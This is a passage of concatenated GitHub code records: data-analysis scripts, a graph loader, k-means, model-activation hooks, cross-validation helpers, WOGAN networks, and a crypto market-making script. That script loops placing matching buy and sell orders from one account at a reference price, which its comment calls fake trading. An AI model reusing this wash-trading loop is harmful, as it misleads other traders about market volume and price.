US)\n try: \n return pyc.countries.get(alpha_2=cname).alpha_3\n \n except KeyError:\n return None\n \n #Special case for UK \n if(cname=='UK'):\n return 'GBR'\n\n#Formats a cmap into an RGB map ---(source: plotly API)---\ndef cmap_RGB(col_map, inverse):\n \n cmap = matplotlib.cm.get_cmap(col_map)\n col_map_rgb = []\n norm = matplotlib.colors.Normalize(vmin=0, vmax=255)\n \n for i in range(0, 255):\n k = matplotlib.colors.colorConverter.to_rgb(cmap(norm(i)))\n col_map_rgb.append(k)\n \n def matplotlib_plotly(c_map, pl_entries):\n h = 1.0/(pl_entries-1)\n pl_colorscale = []\n \n for k in range(pl_entries):\n \n if(inverse):\n idx = ((pl_entries-1)-k)*h #inverse the colour order\n else:\n idx = k*h #regular order\n \n \n c = list(map(np.uint8, np.array(c_map(idx)[:3])*255))\n pl_colorscale.append([k*h, 'rgb'+str((c[0], c[1], c[2]))])\n \n return pl_colorscale\n \n return matplotlib_plotly(cmap, 255)\n\ndef country_data(df):\n \n #Count the number of reviews for each country\n world_occurences = df['country_code'].value_counts()\n world_occurences = world_occurences.dropna()\n #Add to a new DataFrame\n df_world = pd.DataFrame({'occurences': world_occurences})\n \n #Average score for each country\n df_world['avg_points'] = df.groupby('country_code')['points'].mean()\n #Average price for each country ($ ?)\n df_world['avg_price'] = df.groupby('country_code')['price'].mean()\n \n #Create dictionary for mapping country names to country codes from the initial DataFrame\n cmap = df[['country_code', 'country']].copy().dropna().drop_duplicates().set_index('country_code').to_dict()['country']\n df_world['country_code'] = df_world.index\n #Map country names to codes\n df_world['country'] = df_world['country_code'].map(cmap)\n \n return df_world\n\n#Create a choropleth chart ---(source: plotly API)---\ndef choropleth(df_world, world_meas, measure):\n \n #Data and styling for plotting\n data = [dict(\n type = 'choropleth',\n locations = df_world['country_code'], #dimension, displayed\n z = df_world[world_meas], #measure, displayed\n text = df_world['country'], #displayed country names\n #colorscale = [[0,\"rgb(5, 10, 172)\"],[0.35,\"rgb(40, 60, 190)\"],[0.5,\"rgb(70, 100, 245)\"],[0.6,\"rgb(90, 120, 245)\"],[0.7,\"rgb(106, 137, 247)\"],[1,\"rgb(220, 220, 220)\"]],\n colorscale = cmap_RGB('BuPu', True),\n autocolorscale = False,\n reversescale = True, #legend goes from high to low\n marker = dict(\n line = dict(\n color = 'rgb(180,180,180)',\n width = 0.5\n )),\n colorbar = dict(\n title = measure),)]\n \n #Chart layout properties\n layout = dict(\n title = measure + ' per country',\n geo = dict(\n showframe = False,\n showcoastlines = False, #country coastlines\n showcountries = True, #country borders\n projection = dict(\n type = 'Mercator')))\n \n #Combine chart properties\n fig = dict(\n data = data,\n layout = layout)\n \n #Save an offline copy of the chart\n offline.plot(fig, filename='wine-scores-map.html')\n \ndef wordcloud(df):\n \n words = ';'.join(df.description.tolist()).lower()\n fig = plt.figure(frameon=False)\n wordcloud = WordCloud().generate(words)\n #wordcloud.to_file('.\\charts\\wordcloud.png')\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.axis(\"off\")\n plt.savefig('.\\charts\\wordcloud.png', format='png', dpi=200)\n \n \n#Apply the country coding function\ndf['country_code'] = 
df['country'].apply(ccode)","repo_name":"azulu/wine-analysis","sub_path":"analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31559648719","text":"import numpy as np\nimport os\n# import dill\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nfrom sklearn import datasets\n\nfrom sklearn.model_selection import train_test_split\nfrom utils.utilities import run_random_walks_n2v\n\nimport torch\n\nnp.random.seed(123)\n\ndef load_graphs(dataset_str):\n \"\"\"Load graph snapshots given the name of dataset\"\"\"\n with open(\"data/{}/{}\".format(dataset_str, \"graph.pkl\"), \"rb\") as f:\n graphs = pkl.load(f)\n print(\"Loaded {} graphs \".format(len(graphs)))\n adjs = [nx.adjacency_matrix(g) for g in graphs] # Sparse matrix\n return graphs, adjs\n\ndef load_graphs_new(dataset_str):\n with open(\"data/{}/{}\".format(dataset_str, \"adj_time_list.pickle\"), \"rb\") as handle:\n adj_time_list = pkl.load(handle,encoding=\"latin1\")\n \n graphs = []\n for i in range(len(adj_time_list)):\n G = nx.from_scipy_sparse_matrix(adj_time_list[i], create_using=nx.MultiGraph)\n graphs.append(G)\n print(\"Loaded {} graphs \".format(len(graphs)))\n adjs = [nx.adjacency_matrix(g) for g in graphs] # Sparse matrix\n # check = [np.sum(adj_time_list[j] != adjs[j]) for j in range(len(graphs))]\n # print(check)\n return graphs, adjs\n\n\n\nif __name__ == \"__main__\":\n dataset = \"Enron\"\n time_steps = 16\n graphs, adjs = load_graphs(dataset)\n # print(len(adjs))\n # print(adjs[0])\n # print(graphs[0][0])\n # print([graph.number_of_nodes() for graph in graphs])\n\n graphs, adjs = load_graphs_new(\"enron10\")\n # print([graph.number_of_nodes() for graph in graphs])\n eval_idx = len(graphs) - 2\n eval_graph = graphs[eval_idx]\n next_graph = graphs[eval_idx+1]\n print(eval_idx)","repo_name":"jinningli/CS562-RTSGNN","sub_path":"baseline/DySAT/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42092967792","text":"import json\r\nimport time\r\n\r\nimport requests\r\n\r\nfrom tools.Config import befinx_base_url, Trade_url\r\nfrom market_maker.bitget_marketmaker import buy, sell\r\nfrom tools.get_market_info import get_currentprice0\r\n\r\n# # taker买卖单\r\n# userUuid = \"4c39e2dfa2844548be76dbd7b6183c47\"\r\n# apiAccountId1 = 10129\r\n# apiAccountId2 = 10129\r\n# platform = \"befinx\"\r\n# symbol = \"gech_sgdt\"\r\n# strategyId = 888\r\n#\r\n# url = \"{}/open-api/open/trade_plate\".format(befinx_base_url)\r\n# res = requests.post(url, data={\"symbol\": symbol.replace(\"_\", \"/\").upper(), \"size\": 200})\r\n# dict = json.loads(res.content.decode())\r\n# befinxdict = {\"platform\": \"befinx\", \"symbol\": symbol}\r\n# ask = dict[\"data\"][\"ask\"]\r\n# bid = dict[\"data\"][\"bid\"]\r\n# print(ask)\r\n# print(bid)\r\n# for i in ask:\r\n# amount = i[\"amount\"]\r\n# price = i[\"price\"]\r\n# buy(userUuid, apiAccountId1, strategyId, platform, symbol, amount, price)\r\n# time.sleep(0.2)\r\n# for i in bid:\r\n# amount = i[\"amount\"]\r\n# price = i[\"price\"]\r\n# sell(userUuid, apiAccountId2, strategyId, platform, symbol, amount, price)\r\n# time.sleep(0.2)\r\n\r\n\r\n# 撤销数据库订单\r\n\r\n# symbol = \"btc_usdt\"\r\n# res1 = r1.hgetall(\"befinx_{}_buyorders\".format(symbol))\r\n# res1 = [json.loads(i) for i in res1.values()]\r\n# res2 = 
r1.hgetall(\"befinx_{}_sellorders\".format(symbol))\r\n# res2 = [json.loads(i) for i in res2.values()]\r\n#\r\n# print(res1)\r\n# print(res2)\r\n# for item in res1+res2:\r\n# print(item)\r\n# if item[\"userUuid\"] == \"4c39e2dfa2844548be76dbd7b6183c47\":\r\n# cancel_1(item[\"userUuid\"], item[\"apiAccountId\"], item[\"strategyId\"], item[\"platform\"], item[\"symbol\"], item[\"orderId\"], item[\"direction\"])\r\n# print(\"****************\")\r\n# time.sleep(1)\r\n\r\n\r\n# 查询redis中的订单,成交的话就删除\r\n# symbol = \"mac_sgdt\"\r\n# symbol = \"gech_sgdt\"\r\n# # symbol = \"eth_usdt\"\r\n# res1 = r1.hgetall(\"befinx_{}_buyorders\".format(symbol))\r\n# res1 = [json.loads(i) for i in res1.values()]\r\n# res2 = r1.hgetall(\"befinx_{}_sellorders\".format(symbol))\r\n# res2 = [json.loads(i) for i in res2.values()]\r\n#\r\n# print(res1)\r\n# print(res2)\r\n\r\n\r\n# for item in res1+res2:\r\n# print(item)\r\n# userUuid = item[\"userUuid\"]\r\n# apiAccountId = item[\"apiAccountId\"]\r\n# strategyId = item[\"strategyId\"]\r\n# platform = item[\"platform\"]\r\n# orderId = item[\"orderId\"]\r\n# direction = item[\"direction\"]\r\n# try:\r\n# data = {\"userUuid\": userUuid,\r\n# \"apiAccountId\": apiAccountId,\r\n# \"strategyId\": strategyId,\r\n# \"platform\": platform,\r\n# \"symbol\": symbol,\r\n# \"orderId\": orderId,\r\n# \"direction\": direction,\r\n# \"source\": 8}\r\n# res = requests.post(Queryorder_url, data=data)\r\n# resdict = json.loads(res.content.decode())\r\n# print(resdict)\r\n# status = resdict[\"response\"][\"status\"]\r\n# print(\"用户{}-{},订单{},状态{}\".format(userUuid, apiAccountId, orderId, status))\r\n# if status == \"closed\" or status == \"cancelled\": # 状态 open挂单中 closed已完成 cancelled撤单 part部分交易\r\n# if direction == 1:\r\n# r1.hdel(\"befinx_{}_buyorders\".format(symbol), orderId)\r\n# if direction == 2:\r\n# r1.hdel(\"befinx_{}_sellorders\".format(symbol), orderId)\r\n# except Exception as e:\r\n# print(\"用户{}-{}查询订单{}失败,报错信息{}\".format(userUuid, apiAccountId, orderId, e))\r\n# if direction == 1:\r\n# r1.hdel(\"befinx_{}_buyorders\".format(symbol), orderId)\r\n# if direction == 2:\r\n# r1.hdel(\"befinx_{}_sellorders\".format(symbol), orderId)\r\n# time.sleep(1)\r\n#\r\n# for item in res1+res2:\r\n# print(item)\r\n# userUuid = item[\"userUuid\"]\r\n# apiAccountId = item[\"apiAccountId\"]\r\n# strategyId = item[\"strategyId\"]\r\n# platform = item[\"platform\"]\r\n# orderId = item[\"orderId\"]\r\n# direction = item[\"direction\"]\r\n# try:\r\n# data = {\"userUuid\": userUuid,\r\n# \"apiAccountId\": apiAccountId,\r\n# \"strategyId\": strategyId,\r\n# \"platform\": platform,\r\n# \"symbol\": symbol,\r\n# \"orderId\": orderId,\r\n# \"source\": 8}\r\n# res = requests.post(Cancel_url, data=data)\r\n# resdict = json.loads(res.content.decode())\r\n# print(resdict)\r\n# if resdict[\"code\"] == 1:\r\n# if direction == 1:\r\n# r1.hdel(\"befinx_{}_buyorders\".format(symbol), orderId)\r\n# print(\"用户{}-{},撤销买单{},返回{}\".format(userUuid, apiAccountId, orderId, resdict))\r\n# if direction == 2:\r\n# r1.hdel(\"befinx_{}_sellorders\".format(symbol), orderId)\r\n# print(\"用户{}-{},撤销卖单{},返回{}\".format(userUuid, apiAccountId, orderId, resdict))\r\n# except Exception as e:\r\n# print(\"用户{}-{}撤销订单{}失败,报错信息{}\".format(userUuid, apiAccountId, orderId, e))\r\n# time.sleep(1)\r\n\r\n\r\n# url = \"{}/open-api/open/trade_plate\".format(befinx_base_url)\r\n# res = requests.post(url, data={\"symbol\": symbol.replace(\"_\", \"/\").upper(), \"size\": 200})\r\n# dict = json.loads(res.content.decode())\r\n# befinxdict = 
{\"platform\": \"befinx\", \"symbol\": symbol}\r\n# ask = dict[\"data\"][\"ask\"]\r\n# bid = dict[\"data\"][\"bid\"]\r\n# print(ask)\r\n# print(bid)\r\n\r\n# from databasePool import POOL_grid\r\n# direction = 2\r\n# conn = POOL_grid.connection()\r\n# cur = conn.cursor()\r\n# cur.execute(\"SELECT orderid FROM `t_balance_order_record`\")\r\n# res = cur.fetchall()\r\n# print(res)\r\n#\r\n# n = 1\r\n# for i in res:\r\n# orderId = i[0]\r\n# print(n,orderId)\r\n# print(\"================================撤单====================================\", int(time.time()))\r\n# cancelparams = {\"direction\": direction, \"symbol\": symbol, \"platform\": platform, \"orderId\": orderId,\r\n# \"apiAccountId\": apiAccountId, \"userUuid\": userUuid, \"source\": source, \"strategyId\": strategyId}\r\n# cancelres = requests.post(Cancel_url, data=cancelparams)\r\n# print(cancelres.url)\r\n# resdict = json.loads(cancelres.content.decode())\r\n# print(resdict)\r\n# n+=1\r\n\r\n\r\n# 测试\r\n\r\nwhile True:\r\n try:\r\n # userUuid = \"398051ac70ef4da9aafd33ce0b95195f\"\r\n # apiAccountId = 10152 # \"btc 总余额122.73294,其中可用122.73294,锁定0.0,usdt总余额487713.34,其中可用482713.3锁定5000.039\"\r\n userUuid = \"6e7c88272f554956a35d8ed2cf833201\"\r\n apiAccountId = 10155\r\n strategyId = 88888888888\r\n platform = \"befinx\"\r\n symbol = \"btc_usdt\"\r\n amount = 0.0001\r\n url = \"{}/open-api/open/trade_plate\".format(befinx_base_url)\r\n res = requests.post(url, data={\"symbol\": symbol.replace(\"_\", \"/\").upper(), \"size\": 200})\r\n dict = json.loads(res.content.decode())\r\n try:\r\n ask = [i for i in dict[\"data\"][\"ask\"] if i[\"price\"] >= 10000]\r\n bid = [i for i in dict[\"data\"][\"bid\"] if i[\"price\"] >= 10000]\r\n except:\r\n ask = []\r\n bid = []\r\n current_price = get_currentprice0(\"okex\", \"btc_usdt\")\r\n if ask == [] and bid == []:\r\n # 刷单(参考okex的价格)\r\n if current_price != 0:\r\n buyparams = {\"direction\": 1, \"amount\": amount, \"symbol\": symbol, \"platform\": platform,\r\n \"price\": current_price,\r\n \"apiAccountId\": apiAccountId, \"userUuid\": userUuid, \"source\": 7, \"strategyId\": strategyId}\r\n buytrade = requests.post(Trade_url, data=buyparams)\r\n sellparams = {\"direction\": 2, \"amount\": amount, \"symbol\": symbol, \"platform\": platform,\r\n \"price\": current_price,\r\n \"apiAccountId\": apiAccountId, \"userUuid\": userUuid, \"source\": 7,\r\n \"strategyId\": strategyId}\r\n selltrade = requests.post(Trade_url, data=sellparams)\r\n else:\r\n for i in ask:\r\n amount = i[\"amount\"]\r\n price = i[\"price\"]\r\n if abs(price - current_price) / current_price < 0.0005:\r\n buy(userUuid, apiAccountId, strategyId, platform, symbol, amount, price)\r\n time.sleep(1)\r\n for i in bid:\r\n amount = i[\"amount\"]\r\n price = i[\"price\"]\r\n if abs(price - current_price) / current_price < 0.0005:\r\n sell(userUuid, apiAccountId, strategyId, platform, symbol, amount, price)\r\n time.sleep(1)\r\n except Exception as e:\r\n print(e)\r\n finally:\r\n time.sleep(1)\r\n","repo_name":"mujinveil/blockchain_quant","sub_path":"market_maker/clear_market_depth.py","file_name":"clear_market_depth.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"14545277494","text":"import statistics as s\r\nimport math as m\r\na=[]\r\nprint(\"enter c ordinate\")\r\np=int(input())\r\nfor i in range(p):\r\n x=float(input())\r\n y=float(input())\r\n a+=[[x,y]]\r\n\r\nn=int(input(\"enter no of 
cluseters\"))\r\nkold=[]\r\nknew=[]\r\ndef my_comp(point1):\r\n return point1[0]*point1[0] + point1[1]*point1[1]\r\na.sort(key=my_comp)\r\nprint(a)\r\nfor i in range(n):\r\n k=a[i*len(a)//n:(i+1)*len(a)//n]\r\n l=len(k)\r\n x=0\r\n y=0\r\n for j in range(l):\r\n x+=int(k[j][0])\r\n y+=int(k[j][1])\r\n kold+=[(x/l,y/l)]\r\nknew = kold\r\nnon=[0*2]*n\r\nk1=[0]*n\r\nk2=[0]*n\r\nfor i in range(len(a)):\r\n dist=[]\r\n for j in range(n):\r\n dist+=[m.sqrt( (knew[j][0]-a[i][0])**2 + (knew[j][1]-a[i][1])**2 )]\r\n print(a[i],\"is in cluseter:\",dist.index(min(dist))+1)\r\n k1[dist.index(min(dist))]+=a[i][0]\r\n k2[dist.index(min(dist))]+=a[i][1]\r\n non[dist.index(min(dist))]+=1\r\nfor i in range(n):\r\n print(k1[i]/non[i],k2[i]/non[i],\" are the centroids\")\r\n\r\n","repo_name":"praneethpillarisetty/k-means","sub_path":"kmeans2d.py","file_name":"kmeans2d.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42831302858","text":"import torch\nfrom collections import defaultdict\n\n\ndef register_activation_saver(model, layer_i):\n\n # n_heads = model.config.num_attention_heads\n\n def save_activations(module, m_in, m_out):\n m_in = m_in[0][:, :1]\n batch_size = m_in.shape[0]\n m_in = m_in.view(batch_size, -1)\n model.cache[layer_i].append(m_in.detach().cpu())\n\n layer = model.roberta.encoder.layer[layer_i].intermediate\n layer.register_forward_hook(save_activations)\n\n\ndef register_hooks(model):\n\n n_layers = model.config.num_hidden_layers\n model.cache = [[] for _ in range(n_layers)]\n\n for layer_i in range(n_layers):\n register_activation_saver(model, layer_i)\n\n\ndef get_activations(model, dataloader, head_mask):\n\n register_hooks(model)\n\n for batch in dataloader:\n\n input_ids = batch['input_ids'].to(model.device, non_blocking=True)\n input_mask = batch['attention_mask'].to(model.device, non_blocking=True)\n label_ids = batch['labels'].to(model.device, non_blocking=True)\n\n with torch.no_grad():\n model(input_ids,\n token_type_ids=None,\n attention_mask=input_mask,\n labels=label_ids,\n head_mask=head_mask)\n\n activations = []\n for layer in model.cache:\n activations.append(torch.cat(layer, dim=0))\n activations = torch.stack(activations, dim=0)\n\n return activations\n","repo_name":"apostolikas/Language-Specific-Subnetworks","sub_path":"utils/head_activations.py","file_name":"head_activations.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17061872109","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 26 20:14:36 2015\n\n@author: grigoriykoytiger\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport scipy.stats as stats\noutputFolder = '../output/Presentation/'\n\nallPredictions = pd.read_csv('../output/tcga/2015-07-23/all_predictions.csv', index_col =0, na_values = ['[Not Available]', '[Not Applicable]', '[Unknown]'])\nallPredictions = allPredictions.ix[~np.isnan(allPredictions['AFATINIB']),:]\n\ngemcitabineResults = allPredictions.ix[allPredictions['pharmaceutical_therapy_drug_name'] == 'GEMCITABINE',:]\ngemcitabineResultsLung = gemcitabineResults.ix[(gemcitabineResults['cancer_type'] == 'LUAD') | (gemcitabineResults['cancer_type'] == 'LUSC'),:]\n\nax = sns.boxplot(x=\"tumor_status\", y='GEMCITABINE', data=gemcitabineResultsLung) \nax = sns.stripplot(x=\"tumor_status\", y='GEMCITABINE', data=gemcitabineResultsLung, jitter=False, 
edgecolor=\"gray\", alpha=.7, size=5)\nfigure = ax.get_figure()\nfigure.savefig(outputFolder + 'GEMCITABINE' + '_tumor_status.pdf')\nax.clear()\n\nwithTumorPrediction = gemcitabineResultsLung.ix[gemcitabineResultsLung['tumor_status'] == 'WITH TUMOR', 'GEMCITABINE']\nwithoutTumorPrediction = gemcitabineResultsLung.ix[gemcitabineResultsLung['tumor_status'] == 'TUMOR FREE', 'GEMCITABINE']\nstats.ranksums(withTumorPrediction, withoutTumorPrediction)\n\nroc_auc_score(np.hstack((np.repeat(0,6), np.repeat(1,12))), np.hstack((withoutTumorPrediction, withTumorPrediction)))\nroc_data = pd.DataFrame()\nroc_data['fpr'], roc_data['tpr'],roc_data['thresholds'] = roc_curve(np.hstack((np.repeat(0,6), np.repeat(1,12))), np.hstack((withoutTumorPrediction, withTumorPrediction)))\nroc_data.plot(x='fpr', y='tpr').get_figure().savefig(outputFolder + 'gemcitabine_ROC_Curve.pdf')\n\n\n\ndoxorubicinResults = allPredictions.ix[allPredictions['pharmaceutical_therapy_drug_name'] == 'DOXORUBICIN',:]\n\n\n#Cross validation graphic\ninput_dir = '2015-07-20/cross_validation/'\ncross_validation_statistics = pd.read_csv(input_dir + 'cross_validation_statistics.csv')\n\nfigure = sns.distplot(cross_validation_statistics['Spearman rho'], bins=[-.05, 0, .05, .1, .15, .2, .25, .3, .35], kde=False).get_figure()\n\nfigure.savefig(outputFolder + 'cross_validation_histogram.pdf')\n","repo_name":"gkoytiger/OncologyOracle","sub_path":"createPresentationFigures.py","file_name":"createPresentationFigures.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31940358859","text":"from enum import IntEnum\nfrom typing import Any, Dict, List, Optional, Tuple, Union\n\nimport numpy as np\n\nfrom sklearn.model_selection import (\n KFold,\n ShuffleSplit,\n StratifiedKFold,\n StratifiedShuffleSplit,\n TimeSeriesSplit,\n train_test_split\n)\n\nfrom typing_extensions import Protocol\n\n\n# Use callback protocol as workaround, since callable with function fields count 'self' as argument\nclass CROSS_VAL_FN(Protocol):\n def __call__(self,\n num_splits: int,\n indices: np.ndarray,\n stratify: Optional[Any]) -> List[Tuple[np.ndarray, np.ndarray]]:\n ...\n\n\nclass HOLDOUT_FN(Protocol):\n def __call__(self, val_share: float, indices: np.ndarray, stratify: Optional[Any]\n ) -> Tuple[np.ndarray, np.ndarray]:\n ...\n\n\nclass CrossValTypes(IntEnum):\n stratified_k_fold_cross_validation = 1\n k_fold_cross_validation = 2\n stratified_shuffle_split_cross_validation = 3\n shuffle_split_cross_validation = 4\n time_series_cross_validation = 5\n\n\nclass HoldoutValTypes(IntEnum):\n holdout_validation = 6\n stratified_holdout_validation = 7\n\n\nDEFAULT_RESAMPLING_PARAMETERS = {\n HoldoutValTypes.holdout_validation: {\n 'val_share': 0.33,\n },\n HoldoutValTypes.stratified_holdout_validation: {\n 'val_share': 0.33,\n },\n CrossValTypes.k_fold_cross_validation: {\n 'num_splits': 3,\n },\n CrossValTypes.stratified_k_fold_cross_validation: {\n 'num_splits': 3,\n },\n CrossValTypes.shuffle_split_cross_validation: {\n 'num_splits': 3,\n },\n CrossValTypes.time_series_cross_validation: {\n 'num_splits': 3,\n },\n} # type: Dict[Union[HoldoutValTypes, CrossValTypes], Dict[str, Any]]\n\n\ndef get_cross_validators(*cross_val_types: CrossValTypes) -> Dict[str, CROSS_VAL_FN]:\n cross_validators = {} # type: Dict[str, CROSS_VAL_FN]\n for cross_val_type in cross_val_types:\n cross_val_fn = globals()[cross_val_type.name]\n cross_validators[cross_val_type.name] = cross_val_fn\n 
return cross_validators\n\n\ndef get_holdout_validators(*holdout_val_types: HoldoutValTypes) -> Dict[str, HOLDOUT_FN]:\n holdout_validators = {} # type: Dict[str, HOLDOUT_FN]\n for holdout_val_type in holdout_val_types:\n holdout_val_fn = globals()[holdout_val_type.name]\n holdout_validators[holdout_val_type.name] = holdout_val_fn\n return holdout_validators\n\n\ndef is_stratified(val_type: Union[str, CrossValTypes, HoldoutValTypes]) -> bool:\n if isinstance(val_type, str):\n return val_type.lower().startswith(\"stratified\")\n else:\n return val_type.name.lower().startswith(\"stratified\")\n\n\ndef holdout_validation(val_share: float, indices: np.ndarray, **kwargs: Any) -> Tuple[np.ndarray, np.ndarray]:\n train, val = train_test_split(indices, test_size=val_share, shuffle=False)\n return train, val\n\n\ndef stratified_holdout_validation(val_share: float, indices: np.ndarray, **kwargs: Any) \\\n -> Tuple[np.ndarray, np.ndarray]:\n train, val = train_test_split(indices, test_size=val_share, shuffle=False, stratify=kwargs[\"stratify\"])\n return train, val\n\n\ndef shuffle_split_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) \\\n -> List[Tuple[np.ndarray, np.ndarray]]:\n cv = ShuffleSplit(n_splits=num_splits)\n splits = list(cv.split(indices))\n return splits\n\n\ndef stratified_shuffle_split_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) \\\n -> List[Tuple[np.ndarray, np.ndarray]]:\n cv = StratifiedShuffleSplit(n_splits=num_splits)\n splits = list(cv.split(indices, kwargs[\"stratify\"]))\n return splits\n\n\ndef stratified_k_fold_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) \\\n -> List[Tuple[np.ndarray, np.ndarray]]:\n cv = StratifiedKFold(n_splits=num_splits)\n splits = list(cv.split(indices, kwargs[\"stratify\"]))\n return splits\n\n\ndef k_fold_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) -> List[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n Standard k fold cross validation.\n\n :param indices: array of indices to be split\n :param num_splits: number of cross validation splits\n :return: list of tuples of training and validation indices\n \"\"\"\n cv = KFold(n_splits=num_splits)\n splits = list(cv.split(indices))\n return splits\n\n\ndef time_series_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) \\\n -> List[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n Returns train and validation indices respecting the temporal ordering of the data.\n Dummy example: [0, 1, 2, 3] with 3 folds yields\n [0] [1]\n [0, 1] [2]\n [0, 1, 2] [3]\n\n :param indices: array of indices to be split\n :param num_splits: number of cross validation splits\n :return: list of tuples of training and validation indices\n \"\"\"\n cv = TimeSeriesSplit(n_splits=num_splits)\n splits = list(cv.split(indices))\n return splits\n","repo_name":"LMZimmer/Auto-PyTorch_refactor","sub_path":"autoPyTorch/datasets/resampling_strategy.py","file_name":"resampling_strategy.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"876343855","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass WOGAN_NN(nn.Module):\n \"\"\"Base class for simple dense neural networks.\"\"\"\n\n def __init__(self, input_shape, hidden_neurons, output_shape, output_activation, hidden_activation, batch_normalization=False, layer_normalization=False):\n super().__init__()\n\n # The dimension of the input vector.\n 
self.input_shape = input_shape\n # The dimension of the output vector.\n self.output_shape = output_shape\n # List of numbers of neurons in the hidden layers.\n self.hidden_neurons = hidden_neurons\n # Use batch normalization before each activation (except the last one).\n self.batch_normalization = batch_normalization\n # Use layer normalization before each activation (except the last one).\n self.layer_normalization = layer_normalization\n\n if self.batch_normalization and self.layer_normalization:\n raise Exception(\"Cannot use both batch normalization and layer normalization (not recommended).\")\n\n # Map for activations.\n activations = {\"leaky_relu\": F.leaky_relu,\n \"linear\": nn.Identity(),\n \"relu\": F.relu,\n \"sigmoid\": torch.sigmoid,\n \"tanh\": torch.tanh}\n\n # Hidden layer activation.\n if not hidden_activation in activations:\n raise Exception(\"Unknown activation function '{}'.\".format(hidden_activation))\n self.hidden_activation = activations[hidden_activation]\n\n # Output activation.\n if not output_activation in activations:\n raise Exception(\"Unknown activation function '{}'.\".format(output_activation))\n self.output_activation = activations[output_activation]\n\n # We use fully connected layers with the specified number of neurons.\n self.top = nn.Linear(self.input_shape, self.hidden_neurons[0])\n self.hidden = nn.ModuleList()\n if self.batch_normalization:\n self.norm = nn.ModuleList([nn.BatchNorm1d(self.hidden_neurons[0])])\n if self.layer_normalization:\n self.norm = nn.ModuleList([nn.LayerNorm(self.hidden_neurons[0])])\n for i, neurons in enumerate(self.hidden_neurons[1:]):\n self.hidden.append(nn.Linear(self.hidden_neurons[i], neurons))\n if self.batch_normalization:\n self.norm.append(nn.BatchNorm1d(neurons))\n if self.layer_normalization:\n self.norm.append(nn.LayerNorm(neurons))\n self.bottom = nn.Linear(self.hidden_neurons[-1], self.output_shape)\n if self.batch_normalization:\n self.norm.append(nn.BatchNorm1d(self.output_shape))\n if self.layer_normalization:\n self.norm.append(nn.LayerNorm(self.output_shape))\n\n def forward(self, x):\n \"\"\":meta private:\"\"\"\n x = self.hidden_activation(self.top(x))\n for i, L in enumerate(self.hidden):\n L = L.to(x.device)\n if self.batch_normalization or self.layer_normalization:\n x = self.hidden_activation(self.norm[i](L(x)))\n else:\n x = self.hidden_activation(L(x))\n if self.batch_normalization or self.layer_normalization:\n x = self.output_activation(self.norm[-1](self.bottom(x)))\n else:\n x = self.output_activation(self.bottom(x))\n\n return x\n\nclass CriticNetwork(WOGAN_NN):\n \"\"\"Define the neural network model for the WGAN critic.\"\"\"\n\n def __init__(self, input_shape, hidden_neurons, hidden_activation=\"leaky_relu\", batch_normalization=False, layer_normalization=False):\n super().__init__(input_shape=input_shape,\n hidden_neurons=hidden_neurons,\n output_shape=1,\n output_activation=\"linear\",\n hidden_activation=hidden_activation,\n batch_normalization=batch_normalization,\n layer_normalization=layer_normalization\n )\n\nclass GeneratorNetwork(WOGAN_NN):\n \"\"\"Define the neural network model for the WGAN generator.\"\"\"\n\n def __init__(self, noise_dim, hidden_neurons, output_shape, hidden_activation=\"relu\", batch_normalization=False, layer_normalization=False):\n super().__init__(input_shape=noise_dim,\n hidden_neurons=hidden_neurons,\n output_shape=output_shape,\n output_activation=\"tanh\",\n hidden_activation=hidden_activation,\n batch_normalization=batch_normalization,\n 
layer_normalization=layer_normalization\n )\n\nclass AnalyzerNetwork(WOGAN_NN):\n \"\"\"Define a regression neural network model for the WOGAN analyzer.\"\"\"\n\n def __init__(self, input_shape, hidden_neurons, hidden_activation=\"relu\", layer_normalization=False):\n super().__init__(input_shape=input_shape,\n hidden_neurons=hidden_neurons,\n output_shape=1,\n output_activation=\"sigmoid\",\n hidden_activation=hidden_activation,\n layer_normalization=layer_normalization\n )\n \nclass AnalyzerNetwork_classifier(WOGAN_NN):\n \"\"\"Define a classification neural network model for the WOGAN analyzer.\"\"\"\n\n def __init__(self, classes, input_shape, hidden_neurons):\n # Number of classes.\n self.classes = classes\n super().__init__(input_shape=input_shape,\n hidden_neurons=hidden_neurons,\n output_shape=self.classes,\n output_activation=\"linear\",\n hidden_activation=\"relu\",\n batch_normalization=True\n )\n\nclass AnalyzerNetwork_conv(nn.Module):\n \"\"\"Defines a neural network model for the WOGAN analyzer which uses 1D\n convolution.\"\"\"\n\n def __init__(self, input_shape, feature_maps, kernel_sizes, convolution_activation, dense_neurons):\n \"\"\"\n Creates a convolutional network with the following structure. For each\n number in the list feature_maps, create a 1D convolutional layer with\n the specified number of feature maps followed by a maxpool layer. The\n kernel sizes of the convolutional layer and the maxpool layer are\n specified by the first tuple in kernel_sizes. We use the specified\n activation function after each convolution layer. After the\n convolutions and maxpools, we use a single dense layer of the specified\n size with sigmoid activation.\n\n We always pad K-1 zeros when K is the kernel size. For now, we use a\n stride of 1.\n 